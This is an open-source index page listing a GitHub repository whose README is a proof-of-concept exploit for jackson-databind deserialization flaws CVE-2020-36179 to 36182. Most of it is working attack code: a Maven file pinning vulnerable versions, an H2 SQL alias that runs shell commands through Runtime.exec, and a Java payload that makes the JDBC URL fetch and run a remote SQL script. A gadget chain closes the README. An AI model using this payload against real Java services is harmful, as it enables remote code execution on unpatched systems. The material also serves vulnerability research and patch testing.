Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/Al1ex/CVE-2020-36179

CVE-2020-36179~82 Jackson-databind SSRF&RCE
https://github.com/Al1ex/CVE-2020-36179

cve-2020-36179 jackson-databind rce ssrf

Last synced: 22 days ago
JSON representation

CVE-2020-36179~82 Jackson-databind SSRF&RCE

Host: GitHub
URL: https://github.com/Al1ex/CVE-2020-36179
Owner: Al1ex
Created: 2021-01-10T06:47:49.000Z (almost 4 years ago)
Default Branch: main
Last Pushed: 2021-01-10T06:48:53.000Z (almost 4 years ago)
Last Synced: 2024-08-05T17:42:22.568Z (4 months ago)
Topics: cve-2020-36179, jackson-databind, rce, ssrf
Homepage:
Size: 177 KB
Stars: 79
Watchers: 3
Forks: 9
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

awesome-hacking-lists - Al1ex/CVE-2020-36179 - CVE-2020-36179~82 Jackson-databind SSRF&RCE (Others)

README

        ## Description

CVE-2020-36179：

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS.

CVE-2020-36180：

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS.

CVE-2020-36181：

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS.

CVE-2020-36182：

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS.

## How to RCE

Because the above four CVE security vulnerabilities are triggered in a similar way, here we only take CVE-2020-36180 as an example:

pom.xml

```

    4.0.0

    com.jacksonTest

    jacksonTest

    1.0-SNAPSHOT

    

        

            com.fasterxml.jackson.core

            jackson-databind

            2.9.10.7

        

        

        

            org.apache.commons

            commons-dbcp2

            2.8.0

        

        

        

            com.h2database

            h2

            1.4.199

        

        

            org.slf4j

            slf4j-nop

            1.7.2

        

        

        

            javax.transaction

            jta

            1.1

        

    

```

exec.sql:

```

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {

        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");

        return s.hasNext() ? s.next() : "";  }

$$;

CALL SHELLEXEC('calc.exe')

```

poc.java

```

import com.fasterxml.jackson.databind.ObjectMapper;

import com.fasterxml.jackson.databind.SerializationFeature;

public class POC {

    public static void main(String[] args) throws Exception {

        String payload = "[\"org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS\",{\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:3333/exec.sql'\"}]";

        ObjectMapper mapper = new ObjectMapper();

        mapper.enableDefaultTyping();

        mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);

        Object obj = mapper.readValue(payload, Object.class);

        mapper.writeValueAsString(obj);

    }

}

```

result:

![result](img/result.jpg)

Gadget:

```

DriverAdapterCPDS

    ->seturl

        ->getPooledConnection

            ->DirverManager.getConnection(this.url,username,pass)

```